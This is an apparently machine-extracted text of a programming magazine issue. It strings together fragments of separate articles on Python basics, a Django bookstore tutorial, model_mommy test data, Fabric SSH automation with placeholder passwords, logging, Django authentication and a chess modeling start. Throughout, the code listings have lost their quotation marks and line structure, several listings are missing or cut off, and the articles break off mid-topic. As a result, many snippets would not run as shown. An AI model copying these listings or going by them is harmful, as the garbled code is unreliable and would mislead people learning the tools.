Having our python prompt, we are going to do some calculations and store our results in variables.
>>> a = 2 variable a stores 2
>>> b = 3 variable b stores 3
>>> sum = a+b variable sum stores value of a+b
Now sum contains the sum of a and b, how do we know if this actually worked, well lets print the
value of sum and see:
>>> print sum
5 result
>>> sub = 50 -20
>>> print sub
30
Yes, its as easy as that, unlike C, Java etc. You do not need to compile your code in order to see the output,
this is an interpreted language and when using the interactive programming environment, we get outputs
immediately. Lets do some multiplication.
>>> product = 3*6
>>> print product
18
I know you want to ask a question, how did 5/2 become 2 right! Yes its 2 because our answer has been
rounded down to the nearest integer. If we want our answer in float we can simply divide like Listing 1.
Listing 1. Division and modular
>>> div = 5/2.0
>>>print div
2.5
>>> mod = 10 % 2
>>> print mod
0
46
Importing Modules
Now, what if we want to calculate the square root of a number? Unfortunately square root is not part of the
python standard library (built in functions can be found here http://docs.python.org/2/library/functions.
html#raw%5Finput) but fortunately enough there are lots of tools provided in python and one of those is the
math module.
A module is a file that contains variable declarations, function implementations, classes etc. And we can
make use of this functions and variables by importing the module into our environment. Lets get to practice;
this is how you import a module to your environment
>>> import math
And now we have imported that module with all its tools, somewhere in it, is the square root function that
we can call, using:
>>> math.sqrt(25)
5
You see that we used math.sqrt() what if we just want to use sqrt(), well there is a way, we import sqrt this
way in Listing 2.
Also we can concatenate strings together by the use of the + operator like this:
>>> print Jane + +Doe
Jane Doe
47
Note: there is another way of taking user defined inputs using the input() but I dont advice using it now until
you really know what you are doing, the fact is whatever you pass to input() it gets evaluated, if you want for
instance a string 3 when you pass it to input() it gets evaluated and converted to an integer and that can cause
a whole lot of trouble. So just avoid it.
Enough with the basics, lets get down to some data structures.
Lists
Lists are very similar to arrays and they can store elements of any type and contain as much elements as you
want. Lets take a look at declarations and storage of elements in a list:
>>> myList = []
This automatically declares a list for you, and you can populate it with elements using a method provided by
the list object append see Listing 3. And can also print elements in a specific location like this:
>>> print myList[0]
1
You can learn more about other list functions here http://docs.python.org/2/tutorial/datastructures.html.
Listing 3. Adding elements to a list
>>>
>>>
>>>
>>>
[1,
myList.append(1)
myList.append(2)
myList.append(3)
print myList
2, 3]
48
Now this is a bit new to some, what was done here is, we go through each element in goods list using for
loop and the variable I assume each of the elements one after the other until there are no more elements,
evaluating at each stage.
Functions
Functions are a way to divide our code into a modular structure, to enable reuse, readability and save time.
If there is a particular process that is written over and over again, this can be a bit bogus and inefficient, but
when we define functions, we can easily call whenever its needed.
I will show you how a function a written:
>>> def function(args):
print args
This is a simple function that prints whatever is passed to it and you can test it by runing this:
>>> function(name)
name
It prints out what you pass to it, also we can return values from a function, take for instance, lets write a
function that takes in two numbers, add them together and returns the value:
>>> def add(a, b):
return a+b
Exactly nothing happened, because we did not print the returned value. Now lets store what is returned to a
variable and print it out.
>>> sum = add(2, 4)
>>> print sum
6
Comments
Commenting code is a good practice for programmers, it helps whoever reads your code to what you were
doing and sometimes its helpful when modifying your code or updating. Comments in python are striped out
during parsing, and we comment in python by putting # before the line we want to comment on. Like this:
>>>#this is a comment
>>>
49
Docstring
Now that you have learned how to use variables, import modules, operators, conditional statements, iterator,
function and lists. Lets introduce something called Docstring.
Docstring is a string literal that is used to document codes; usually stating what a particular function is, or
a class, or modules. Unlike comments or other type of documentations, docstring is not stripped from the
source code during source parsing, but retained and inspected together with the source file. This allows us to
completely document our code within the source code and this is written within three opening and closing
quotes e.g. contents . Lets see how this is written. Example at Listing 5.
Listing 5. Format of Docstring
Source defining the animal class, containing one method and another separate method
class Animal(object):
def talk(self):
Method that shows how animals talk
def mate(animal):
Method for mating animals
Now what if we want to view the docstring of a function, to learn about what that function does or the usage,
well we can use the help() function, it prints the docstring of that function. Lets see Listing 6.
Listing 6. Using help() to learn more about a function usage and definition (printing docstring)
>>> import math
>>> help(math.pow)
Help on built-in function pow in module math:
pow(...)
pow(x,y)
Return x**y (x to the power of y). is the docstring
See that, we learnt a lot about the pow() function by printing the docstring of pow() using help().
First we defined a list object, and then passed it to dir() and it returned all the methods that are applicable to
this particular object.
50
Summary
This document is just an introduction to python, it is designed to make you comfortable with the
environment and some concepts, tricks and methods in python programming language. This will help you be
able to learn more advanced topics on your own. I advice you to keep practicing and creating different tasks
for yourself. That is the only way you will become a good Software Developer.
51
This command creates a python virtual environment called sdjournal with no references to other installed
libraries (--no-site-packages --clear) and using the python interpreter 2.x.
Note: django works with both python 2.x and python 3.x versions, but many of the third part applications are
developed using python 2.x (the 2.x version is a safer version to be used).
In future to access the virtual environment shell is required to activate it:
workon sdjournal
52
Now the environment and some base libraries are installed, we can create a simple Django project (a book
store): be sure to be in the virtualenv directory (cdvirtualenv) and type:
After having installed Django, the django-admin.py command is available in the virtualenv. It allows
executing a lot of administrative commands such as project management, database management, i18n
(translation) management,
The syntax is django-admin.py
some files such as:
<command>:
mybookstore/manage.py
mybookstore/mybookstore
mybookstore/mybookstore/__init__.py
mybookstore/mybookstore/settings.py
mybookstore/mybookstore/urls.py
mybookstore/mybookstore/wsgi.py
Set up media directory, which contains uploaded media files. The settings is controlled by MEDIA_
ROOT setting: well set it to media directory in the virtualenv root.
MEDIA_ROOT = os.path.join(os.path.dirname(os.getcwd()), media)
Set up static directory, which contains static files such as images, javascript and css. This parameter is
controlled by STATIC_ROOT setting: well set it to static directory in the virtualenv root.
STATIC_ROOT = os.path.join(os.path.dirname(os.getcwd()), static)
Set up installed applications. In INSTALLED_APPS setting, we must put the list of all the application that
we want installed and available in the current project.
53
This command creates a new app/directory called bookshop containing these files:
_ _ init _ _ .py:
models.py: the file that will contain the models of this app. Initially it contains no objects.
tests.py: the unittest file for this application. This file contains a test stub to start with.
views.py: this files contains the views that are used in this application. The standard file is empty.
Generally an app directory contains some other files such as:
admin.py: which contains the administrative interface definition for the application. Well have a fast
briefing on it at the end of the article.
urls.py that contains app custom url routing.
migrations directory/package: if south app is installed and the app contains migrations. This directory
stores all the model changes.
management directory/package: which contains script that are executed on syncdb and custom application
commands.
static directory: which contains application related static files (i.e. js, css, images)
templates directory: which contains HTML templates used for rendering.
templatetags: which contains custom template tags and filters used for rendering in this application.
Now that we have created an application, we must add it to INSTALLED_APPS list to enable it. In settings.
py, the INSTALLED_APPS setting will be:
INSTALLED_APPS = (
django.contrib.auth,
django.contrib.contenttypes,
54
Django takes care of creating missing tables and populating the initial database with the syncdb command.
python manage.py syncdb
The first time its executed, if there is no superuser, the command asks to create it and guides the user to
creating of an admin account.
The syncdb command creates the database if its missing; if some tables are not available, it creates them with
sequences, indices and foreign key contraints.
Now our semi working complete application can be executed in developer mode using the built-in django
with the following command:
python manage.py runserver
It starts a server listening on localhost port 8000, so just navigate to http://127.0.0.1:8000 to see your site.
NOTE: generally for every common task, the Django user doesnt need to know the SQL language, as the
Django ORM manages it transparently and multi DBMS (oracle, mysql, postgresql, Sqlite). Django doesnt
require users SQL knowledge.
55
56
This command creates required table, sequence and index for the current installed applications.
Django urls control is based on regular expressions. In our example, the first url command registers an
empty string, a view index (expanded in bookshop.views.index) and a name to call this url. The second
url command registers a value book_id to be passed as variable to a detail view (formaly bookshop.
views.detail) and the name of this url.
During url dispatching Django try to check the correct view to serve based regular expression matching.
The view function is a simple Python function that returns a Response object or its derived ones. We need to
define two views index and detail (Listing 3).
57
The index needs to show all the available books: we create a context with a books queryset and we render
it with a HTML template. The queyset, accessible for every model using the objects attribute, is an ORM
element that allows executing query on data without using SQL. The Django ORM takes to create and
execute SQL code. In the index, Book.objects.all() retrieve all the books objects.
The detail view, which takes a parameter book_id passed by url routing, create a context with a variable
book which contains the Book data. In this case, the queryset method that executes a query with given
parameters and returns a Book object or an Exception. If there is no book with pk equal to book_id variable
a HTTP 400 error is returned: this fallback prevents nasty users url manipulation.
{{value}} or {{value0.method1.value2}}
{{value|filter}}
{% tagname %}
is used to change with a filter: a value transformation such as text formatting or number and
date/time formatting. A field return a value that can be passed to another filter.
are used to process tags: functions that extends HTML capabilities. (See https://docs.
djangoproject.com/en/dev/ref/templates/builtins/ for built in)
Generally templates of an application live in the template subdirectory of the same application. For the shop/index.
html page will have a similar template (Listing 4).
Listing 4. shop/index.html template used to render the index page
<!DOCTYPE html>{% load i18n %}
<html><head><title>{% trans Index of books %}</title></head>
<body>
<h1>{% trans Book List %}</h1>
<ul>
{% for book in books %}
<li><a href={% url shop:detail book.pk %}>
{{ book.title }} {% trans by %} {{ book.author }}</a>
</li>
58
Also the shop/details.html template is very simple: Listing 5. The Django tags used in these templates are:
load:
it allows to load in the rendering context a tag library. I loaded i18n to autolocalize string (translate
string in your local language).
trans:
forendfor:
url:
empty:
if .. else ..endif
The templatetags and filters are very powerful tools, online there are a lot of libraries to extend the template
engine for executing ajax, pagination,
The results are shown in the following images (Figure 2 and Figure 3).
59
In this article we have privileged to keep simpler templates. Its very easy creating cool sites using some css
templating such as twitter bootstrap or other javascript/css web frameworks such as YUI or jquery.
To register some models in the admin interface a new file in our application directory is required: bookshop/
admin.py (Listing 7).
Listing 7. bookshop/admin.py bookshop admin file
from django.contrib import admin
from bookshop.models import Book, Author, Tag
class BookAdmin(admin.ModelAdmin):
list_display = (title, author, available, in_stock, price)
search_fields = [title, description]
list_filter = (available, in_stock, price)
admin.site.register(Book, BookAdmin)
admin.site.register(Author)
admin.site.register(Tag)
Registering a model in the admin is very simple; its enough to call the admin.site.register method with the
model that we want to register.
60
list _ display
that contains a list of field names that must be shown in the admin list view table
search _ fields
list _ filter
The following images show the admin book list view and the admin editing view (Figure 4 and Figure 5).
61
Conclusions
In this article we have a fast briefing on how easy and powerful is Django. We have seen the installation, the
creation of an application, the base models-views-templates of Django and the admin interface setup. These
elements are the skeleton to build from simple sites to big and complex ones.
If you are impatient, the tutorials and documentations on Django site are good places to start with; otherwise
in the next articles well go in deep on these article features and well introduce of many others such as the
cache, user/group management, middlewares, custom filter and tags,
On The Web
62
tag = models.CharField(max_length=50)
63
class Category(models.Model):
name = models.CharField(max_length=50)
description = models.CharField(max_length=300)
class Post(models.Model):
title = models.CharField(max_length=300)
body = models.TextField()
date = models.DateTimeField()
user = models.ForeignKey(User)
category = models.ForeignKey(Category)
tags = models.ManyToManyField(Tag)
class Comment(models.Model):
body = models.CharField(max_length=256)
date = models.DateTimeField()
post = models.ForeignKey(Post)
user = models.ForeignKey(User)
username = models.CharField()
password = models.CharField()
first_name = models.CharField()
last_name = models.CharField()
email = models.CharField()
Now suppose we need to write a test relating to the Post model. Lets assume we want to write a test to
verify that a view that renders a post shows the posts category correctly. At minimum, this requires having
several objects, at least a Post, a Category, and a User. The standard method of testing Django applications
requires placing these into a fixture. Fixtures are serialized data in disk files, that can be stored in JSON,
XML, or YAML format. Fixtures can be created by hand, but this is not recommended. Django provides a
command to serialize the data in your current database by running the command: python manage.py dumpdata.
By default, this will serialize the data into JSON format to stand out. For our data model, if we wanted to
have a fixture to test a Post, the smallest fixture we could use might look something like this: Listing 3.
Listing 3. Model of data
[
fields: {
description: TestDesciption,
name: TestCategory
},
64
},
{
}
{
},
model: blog.category,
pk: 1
fields: {
body: Test Body,
category: 1,
date: 2013-08-09T00:21:32.766Z,
tags: [],
title: Test Post,
user: 1
},
model: blog.post,
pk: 1
fields: {
email: test@user.com,
first_name: test,
last_name: user,
password: ,
username: TestUser
},
model: blog.user,
pk: 1
We could use this fixture in our test case, but already some questions may have come to your mind:
How do I make this test data in the first place before calling dumpdata?
How can I reuse this fixture if a different test case needs slightly different test data?
What happens when my data model changes?
65
Lets return to the task of creating a unit test for ensuring the category name shows up when rendering a
post. In this case, the only piece of test data we care about is the name field of the category. Using model_
mommy, we can write the entire test with just this code: Listing 5. Note that this test case isnt using fixtures
at all, all the data for this test case is generated by this single line:
post = mommy.make(Post, category__name=TestCategory)
In this one line, model-mommy has made for us a Post, a Category, and a User. We have specified the type of
object, and name of the category in the arguments to mommy.make, but nothing else. We didnt need to write
any object factory class by hand. Model-mommy has filled all the unspecified fields with auto-generated data.
Listing 5. Test with model_mommy
from django.test import TestCase
from model_mommy import mommy
class BlogTests(TestCase):
def test_post_displays_category(self):
We dont control this data (although as well see later, we can tell model-mommy how to generate these
fields), but for this test case, this data is irrelevant since we are not making any assertions about it.
Compared to using fixtures, some advantages may be immediately obvious:
We didnt have to separately make a Post, Category, and User model instance, model_mommy can make
an entire object graph in one invocation.
We didnt have to generate any data ahead of time, all the data is made inside the test itself.
Since all the test data is inside the test itself, it is easy to see by quick visual inspection that the assertions
match the data.
Tests written in this style are quicker to write and easier to read compared to using a fixture. Further, lets
suppose we add a field hometown to the User model. If we are using fixtures, we have to regenerate
every fixture that contains a User instance. With model-mommy, we will end up creating new Users with
hometown fields automatically populated. You only need to specify a hometown in tests that make assertions
about it, which presumably you will write only after you create the new field. All of your existing tests
should continue to run.
66
This instructs model-mommy to make an instance of a hypothetical Model class, specifying values for
field1 and field2. If Model contains other fields, model-mommy will automatically generate values for
these fields. The instance is persisted in the configured database immediately, thus it will be visible
to subsequent code. You can use the mommy.prepare method if you dont want the new instance to be
persisted in the database.
Model-mommy will create any foreign-key related models that you dont specify automatically. If you
need to specify fields on these auto-generated models, you can tell model-mommy to create these fields in
one step using a double underscore notation similar to the Django ORM:
new_model = mommy.make(Model, related__field=test)
assert new_model.related.field == test
Using this notation, you can often create data for a test in a single line of code. However, if you are
generating many fields, it can be easier to generate data in multiple steps:
new_user = mommy.make(User, username=testuser, email=t@t.com)
new_post = mommy.make(Post, post=test, user=new_user)
If you do want to control how model-mommy generates unspecified fields, you can define a Recipe that
tells model-mommy how to generate fields that you want specified: Listing 6.
Listing 6. Specifing fields
>>> from model_mommy import mommy
>>> from model_mommy.recipe import seq, Recipe
>>> category_recipe = Recipe(Category, name=seq(Test))
>>> category_recipe.make().name
Test1
>>> category_recipe.make().name
Test2
In the above example we use the seq function, which allows you to make unique values for multiple instances.
Recipes can also use callables to programatically generate fields. Recipes can also use other recipes to create
foreign keys. Suppose we wanted to be able to create multiple posts, all with unique dates and unique users.
We could do this as follows: Listing 7.
67
For simple test cases, you can get by without needing to specify recipes. However, if you need more control
over how model-mommy generates data, recipes can help you accomplish this.
user = mommy.make(User)
posts = mommy.make(Post, user=user, _quantity=50)
response = self.client.get(/user/{}.format(user.username))
self.assertContains(response, gold star)
In this example we used model-mommys shortcut of passing the _quantity argument to mommy to
create many models at once. We could have just as easily created the models in our own loop, but using
_quantity can be convenient. We tell the make function to generate each one with the same generated
user. Model-mommy will automatically generate categories for all of our posts, since we didnt specify
one on invocation.
If we had wanted to do this with a fixture, wed have to write a script to generate a large amount of test
data, and use the dumpdata management command to turn this data into a JSON fixture. Most likely wed
have to check both this script and the resulting fixture into our projects source control, and change them
if the schema of User or Post ever changed. Using model-mommy, all these steps are replaced with one
line of code.
68
Summary
Using specific examples, Ive shown how using model-mommy can make your Django unit tests much
more concise, simpler, and robust. We covered some basic patterns of how to use model-mommy to build
simple test cases with simple as well as repeated data. Id like to thank Vanderson Mota dos Santos and the
entire model-mommy development community for their helpful contribution to the Django development
community. Hopefully the methods shown in this article can greatly simplify the writing of tests in your
Django applications, leading to better test coverage and more robust code. More importantly, by removing
unnecessary data and boilerplate, it just makes writing tests more fun.
69
After installing it, you may update it to the latest version using pip itself:
$ sudo pip install pip --upgrade
To work with Fabric, you must have SSH installed and properly configured with the necessary users
permissions on the remote servers you want to work on. In the examples, we will consider a Debian
system with IP address 192.168.250.150 and a user named administrator with sudo powers, which is
required only for performing actions that require superuser rights. One way to use Fabric is to create a
file called fabfile.py containing one or more functions that represent the tasks we want to execute, for
example, take a look at Listing 1.
Listing 1. A basic fabfile. File: fabfile.py
# -*- coding: utf-8 -*from fabric.api import *
env.hosts = [192.168.250.150]
env.user = administrator
def remote_info():
run(uname -a)
def local_info():
local(uname -a)
70
In this case, Fabric will ask for the password of the user administrator, as it is connecting to the server via
SSH, as shown on Listing 3.
Listing 3. Output of fab remote_info
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
Linux
[192.168.250.150]
Done.
Disconnecting from 192.168.250.150... done.
There are lots of parameters that can be used with the fab command. To obtain a list with a brief description
of them, you can run fab --help. For example, running fab -l, it is possible to check the Fabric tasks
available on the fabfile.py file. Considering we have the fabfile.py file shown on Listing 1, we obtain the
output of Listing 4 when running fab -l.
Listing 4. output of fab -l
Available commands:
local_info
remote_info
As in the previous example, on the file fabfile.py, the function run() may be used to run a shell command on
a remote server and the function local() may be used to run a shell command on the local computer. Besides
these, there are some other possible functions to use on fabfile.py:
sudo(shell command):
71
to get a file from a remote path on the remote server to the local path on
Also, it is possible to set many other details about the remote connection with the dictionary env. To see a
full list of env vars that can be set, visit:
http://docs.fabfile.org/en/1.6/usage/env.html#full-list-of-env-vars.
Among the possible settings, its worth to spend some time commenting on some of them:
user: defines which user will be used to connect to the remote server;
hosts: a Python list with the addresses of the hosts that Fabric will connect to perform the tasks. There
may be more than one host, e.g.,
env.hosts = [192.168.250.150,192.168.250.151]
host_string: with this setting, it is possible to configure a user and a host at once, e.g.
env.host_string = administrator@192.168.250.150
As it could be noticed from the previous example, Fabric will ask for the users password to connect to the
remote server.
However, for automated tasks, it is interesting to be able to make Fabric run the tasks without prompting for
any user input. To avoid the need of typing the users password, it is possible to use the env.password setting,
which permits you to specify the password to be used by Fabric, e.g.
env.password = mysupersecureadministratorpassword
If the server uses SSH keys instead of passwords to authenticate users (actually, this is a good practice
concerning the servers security), it is possible to use the setting env.key_filename to specify the SSH key to
be used. Considering that the public key ~/.ssh/id_rsa.pub is installed on the remote server, you just need to
add the following line to fabfile.py:
env.key_filename = ~/.ssh/id_rsa
It is also a good security practice to forbid root user from logging in remotely on the servers and allow
the necessary users to execute superuser tasks using the sudo command. On a Debian system, to allow the
administrator user to perform superuser tasks using sudo, first you have to install the package sudo, using:
# apt-get install sudo
and then, add the administrator user to the group sudo, which can be done with:
# adduser administrator sudo
Having this done, you could use the sudo() function on Fabric scripts to run commands with sudo powers.
For example, to create a mydir directory within /home, you may use the fabfile.py file shown on Listing 5.
Listing 5. script to create a directory. File: fabfile.py
# -*- coding: utf-8 -*from fabric.api import *
env.hosts = [192.168.250.150]
env.user = administrator
env.key_filename = ~/.ssh/id_rsa
72
def create_dir():
sudo(mkdir /home/mydir)
And call
$ fab create_dir
which will ask for the password of the user administrator to perform the sudo tasks, as shown on Listing 6.
Listing 6. output of fab create_dir
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150] out:
Done.
Disconnecting from 192.168.250.150... done.
When using SSH keys to log in to the server, you can use the env.password setting to specify the sudo
password, to avoid having to type it when you call the Fabric script. In the previous example, by adding:
env.password = mysupersecureadministratorpassword
would be enough to make the script run without the need of user intervention.
However, some SSH keys are created using a passphrase, required to log in to the server. Fabric treat these
passphrases and passwords similarly, which can sometimes cause confusion. To illustrate Fabrics behavior,
consider the user named administrator is able to log in to a remote server only by using his/her key named
~/.ssh/id_rsa2.pub, created using a passphrase, and the Fabric file shown on Listing 7.
Listing 7. Example fabfile using an SSH key with a passphrase. File: fabfile.py
# -*- coding: utf-8 -*from fabric.api import *
env.hosts = [192.168.250.150]
env.user = administrator
env.key_filename = ~/.ssh/id_rsa2
def remote_info():
run(uname -a)
def create_dir():
sudo(mkdir /home/mydir)
73
makes Fabric ask for a Login password. However, as you shall notice, this Login password refers to the
necessary passphrase to log in using the SSH key, as shown on Listing 8.
Listing 8. Output of fab remote_info
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
[192.168.250.150]
Linux
[192.168.250.116]
Done.
Disconnecting from 192.168.250.150... done.
In this case, if you specify the env.password setting, it will be used as the SSH passphrase and, when running
the create_dir script, Fabric will ask for the password of the user administrator. To avoid typing any of
these passwords, you may define env.password as the SSH passphrase and, within the function that uses sudo(),
redefine it as the users password, as shown on Listing 9.
Listing 9. Example fabfile using an SSH key with a passphrase. Improved to avoid the need of user intervention. File: fabfile.py
# -*- coding: utf-8 -*from fabric.api import *
env.hosts = [192.168.250.150]
env.user = administrator
env.key_filename = ~/.ssh/id_rsa2
env.password = sshpassphrase
def remote_info():
run(uname -a)
def create_dir():
env.password = mysupersecureadministratorpassword
sudo(mkdir /home/mydir)
Alternatively, you could specify the authentication settings from within the task function, as shown on Listing 10.
Listing 10. Another example fabfile using an SSH key with a passphrase. Improved to avoid the need of user intervention. File:
fabfile.py
# -*- coding: utf-8 -*from fabric.api import *
env.hosts = [192.168.250.150]
def create_dir():
env.user = administrator
env.key_filename = ~/.ssh/id_rsa2
74
On this example, the command : does not do anything. It only serves as a trick to enable setting env.
password twice: first for the SSH passphrase, required for login and then to the users password, required for
performing sudo tasks.
If necessary, it is possible to use Pythons with statement (learn about it on http://www.python.org/dev/peps/
pep-0343/), to specify the env settings. A compatible create_dir() task using the with statement is shown
on Listing 11.
Listing 11. Example using Pythons with statement. File: fabfile.py
# -*- coding: utf-8 -*from fabric.api import *
env.hosts = [192.168.250.150]
def create_dir():
with settings(user = administrator,
key_filename = ~/.ssh/id_rsa2,
password = sshpassphrase):
run(:)
env.password = mysupersecureadministrator
password
sudo(mkdir /home/mydir)
The fab command is used for performing system administration and application deployment tasks from a
shell console. However, sometimes you may want to execute tasks from within your Python scripts. To do
this, you may simply call the Fabric functions from your Python code. To build a script that runs a specific
task automatically, such as create_dir() shown previously, you create a Python script as shown on Listing 12.
Listing 12. Python Script using Fabric. File: mypythonscript.py
#! /usr/bin/env python
# -*- coding: utf-8 -*from fabric.api import *
def create_dir():
with settings(host_string = administrator@192.168.250.150,
key_filename = ~/.ssh/id_rsa2,
password = sshpassphrase):
run(:)
env.password = mysupersecureadministrator
password
sudo(mkdir /home/mydir)
if __name__ == __main__:
create_dir()
As we have seen, with Fabric, it is possible to automate the execution of tasks that can be done by executing
shell commands locally, and remotely, using SSH. It is also possible to use Fabrics features on other Python
75
To conclude, we show a more practical example of a Python script that uses Fabric to deploy a very basic
HTML application on a server. The script shown on Listing 13 creates a tarball from the local HTML files at ~/
website, sends it to the server, expands the tarball, moves the files to the proper directory (/var/www/website) and
restarts the server. Hope this article helped you learn a bit about Fabric to automate some of your tasks!
76
It turns out that rewriting that script to use logging instead just aint that hard: Listing 2. And here is the
output: Listing 3. Note how we got that pretty view of the traceback when we used the exception method.
Doing that with prints wouldnt be very much fun. So, at the cost of a few extra lines, we got something
pretty close to print statements, which also gives us better views of tracebacks. But thats really just the tip
of the iceberg. This is the same script written again, but Im defining a custom logger object, and Im using
a more detailed format: Listing 4. And the output: Listing 5. Now I will change how the script handles the
different types of log messages. Debug messages will go to a text file, and error messages will be emailed to
me so that I am forced to pay attention to them (Listing 6). Lots of really great handlers exist in the logging.
handlers module. You can log by sending HTTP posts, you can send UDP packets, you can write to a local
file, etc.
Listing 1. Python standard library logging module
# This is a.py
def g():
1 / 0
def f():
print inside f!
try:
g()
except Exception, ex:
print Something awful happened!
print Finishing f!
if __name__ == __main__:f()
77
1327 Inside f!
1294 Something awful happened!
or modulo by zero
1327 Finishing f!
78
79
80
This architecture has a number of other benefits regarding scalability and manageability. But this article is
about security. So lets review some use cases for web security considerations. Specifically users, passwords,
authentication and authorization.
81
Basics
Two of the pillars of security are Authentication (who are you?) and Authorization (what are you allowed to do?).
Authentication is not something to be invented. Its something to be used. In our preferred architecture, with
an Apache/Django application, the Django authentication system works nicely for identity management. It
supports a simple model of users, groups and passwords. It can be easily extended to add user profiles.
Django handles passwords properly. This cannot be emphasized enough. Django uses a sophisticated stateof-the art hash of the password. Not encryption. Ill repeat that for folks who still think encrypted passwords
are a good idea.
Always use a hash of a password. Never use encryption
Best security practice is never to store a password that can be easily recovered. A hash can be undone eventually,
but encryption means all passwords are exposed once the encryption key is available. The Django auth module
includes methods that properly hash raw passwords, in case you have the urge to implement your own login
page https://docs.djangoproject.com/en/dev/ref/contrib/auth/#django.contrib.auth.models.User.set_password.
Better Authentication
Better than Djangos internal authentication is something like Forge Rock Open AM. This takes identity
management out of Django entirely http://forgerock.com/what-we-offer/open-identity-stack/openam/.
While this adds components to the architecture, its also a blessed simplification. All of the username and
password folderol is delegated to the Open AM server.
Any time a page is visited without a valid Open AM token, the response from a Django app must be a simple
redirect to the Open AM login server. Even the user stories are simplified by assuming a valid, active user.
The bottom line is this: authentication is a solved problem. This is something we shouldnt reinvent. Not
only is it solved, but its easy to get wrong when trying to reinvent it.
Best practice is to download or purchase an established product for identity management and use it for all
authentication.
Authorization
The Authorization problem is more nuanced, and more interesting than Authentication. Once we know who
the user is, we still have to determine what theyre allowed to do. This varies a lot. A small change to the
organization, or a business process, or available data can have a ripple effect through the authorization rules.
We have to emphasize these two points:
Security includes Authorization.
Authorization pervades every feature.
In the case of Django, there are multiple layers of authorization testing. We have settings, we have checks
in each view function and we have middleware classs to perform server-wide checks. All of this is important
and well look at each piece in some detail.
When we define our data model with Django, each model class has an implicit set of three permissions
(can_add, can_delete and can_change). We can add to this basic list, if we have requirements that arent based
on simple Add, Change, Delete (or CRUD) processing.
82
83
For Django 1.5 and newer, the get_profile() isnt used, instead a customized User model is used https://docs.
djangoproject.com/en/1.5/topics/auth/customizing/#extending-user.
The second way to enforce the feature mapping is to enable or disable the entire application in the
customers settings file. This is a simple administrative step to enable an application restart the customers
mod_wsgi instance, and let them use their shiny, new web site.
And yes, this is a form of security. Its not directly related to passwords. Its related to features, functions,
what data users can see and what data users can modify.
More Complexity
Sadly, some of the features our sales folks identified are only a small part of a Django application. In one
case, it cut across several applications Drat. We have several choices to implement these features.
Option 1 is to use template changes to conceal or reveal the feature. This is the closest fit with the way
Django works. The data is available, its just not shown unless the customers settings provides the proper
set of templates on the template search path.
This can also be enforced in the code, also, by making the template name dependent on the customer
settings. Building the template name in code has the advantage of slightly simpler unit testing, since no
settings change is required for the various test cases.
name= settings.FEATURE_W_APP1_TEMPLATE_NAME
render_to_response( app1/{0}.html.format(name),
data,
context_instance=RequestContext(request) )
Option 2 is to isolate a simple feature into a single class and write two subclasses of the feature: an active,
enabled implementation and a disabled implementation. We can then configure the enabled or disabled
subclass in the customers settings.
This is the most Pythonic, since its a very common OO programming practice. Picking a class to instantiate
at run time is simply this:
feature_class= eval(settings.FEATURE_X_CLASS_NAME)
feature_x= feature_class()
This is the easiest to test, also, since its simple object-oriented programming. For those who dont like
eval() a more complex mapping can be used.
feature_class = {
option: class, option: class,
}[settings.FEATURE_X_CLASS_NAME]
feature_x= feature_class()
84
The App2_View subclass of feature_z_super.App2_View is a concrete implementation of the abstract class. All of
the features are handled properly.
The idea is that we our customers settings will include the concrete app module. The concrete app module
will depend on the abstract super app code, plus the specific extensions to either enable feature or work
around the missing feature. When we need to make common changes, we can change the abstract super
app and know that the changes will correctly propagate to the concrete implementations.
In both cases, its very Django to have the application configured dynamically in the settings file.
RESTful Services
RESTful web services are slightly different from the default Django requests. REST requests expect XML
or JSON replies instead of HTML replies. There will be more than GET or POST requests. Additionally,
RESTful web services dont rely on cookies to maintain state. Otherwise, REST requests are processed very
much like other Django requests.
One school of thought is to provide the RESTful API as a separate server. The Django front-end makes
RESTful requests to a Django back-end. This architecture makes it possible to build Adobe Flex or
JavaScript front-end presentations that work with the same underlying data as the HTML presentation.
Another school of thought is to provide the RESTful API in parallel with the Django HTML interface. Since
the RESTful view functions and the HTML view functions are part of the same application module, its easy
to use unit testing to assure that both HTML and REST interfaces provide the same results.
In either case, we need authentication on the RESTful API. This authentication doesnt involve a redirect to
a login page, or the use of cookies. Each request must provide the required information. HTTP provides two
standard forms of authentication: BASIC and DIGEST.
While we can move beyond the standard, it doesnt seem necessary.
The idea behind DIGEST authentication is to provide hashed username and password credentials on an
otherwise unsecured connection. DIGEST requires a dialog so the server can provide a nonce which
is hashed in with username and password. If the clients hash agrees with the servers expectation, the
credentials are good. The back-and-forth aspect of this makes it unpleasantly slow.
85
Its easy to use a Django middleware class to strip out the HTTP Authorization header, parse the username
and password from the credentials and perform a Django logon to update the request.
Heres a sample Middleware class (assuming Python 2.7.5). This example handles all requests prior to URL
parsing; its suitable for a purely RESTful server. In the case of mixed REST and HTML, then process_view
shold be used instead of process_request, and only RESTful views should be authenticated this way. HTML
view functions should be left alone for Djangos own authentication middleware (Listing 2). If youre using
Django 1.5 and Python 3.2, the base 64 decode is slightly different.
base64.b64decode(auth).decode(ASCII)
The ASCII decode is essential because the decoded auth header will be bytes, not a proper Unicode string.
Note that a password is not stored anywhere. We rely on Djangos password management via a hash and
password matching. We also rely on SSL to keep the credentials secret.
Listing 2. Requests prior to URL parsing
class REST_Authentication( object ):
def process_request( request ):
if not request.is_secure():
return HttpResponse(Not Secure, status=500)
if request.method not in (GET, POST, PUT, DELETE):
return HttpResponse(Not Supported, status=500)
86
In the case that youre using an Open AM identity management server, this changes very slightly.
What changes is the implementation of the authenticate() method. Youll provide your own authentication
backend which passes the credentials to the Open AM server for authentication https://docs.djangoproject.
com/en/1.5/topics/auth/customizing/#writing-an-authentication-backend.
Summary
What weve seen are some of the squares used in playing Buzzword Bingo. Weve looked at Defense
in Depth: having multiple checks to assure that only the right features are available to the right people.
Perhaps the most important thing is this:
87
-> B3
Object Modeling
Quite briefly, Chess requires a board consisting of 8x8 squares, 16 White pieces and 16 Black pieces. Each
player is assigned to a color, quite similarly to a general leading an army. Piece types are (in parentheses is
the number of items in each set):
88
Modeling Pieces
Pieces require the following properties to describe their behavior:
Ability for diagonal, straight, L-shaped movement in the board. L-shaped (or Gamma-shaped from the
greek letter ) movement is performed only by Knights.
Ability to pass over other pieces in their movement path. Actually, only Knights are allowed to do this.
Limitation on the number of squares that can be traversed in each move. Pawns and Kings can move one
square distance, Knights make standard L-shaped moves and the rest of the pieces can move freely as long
their path is unobstructed.
The color of the piece (Black or White).
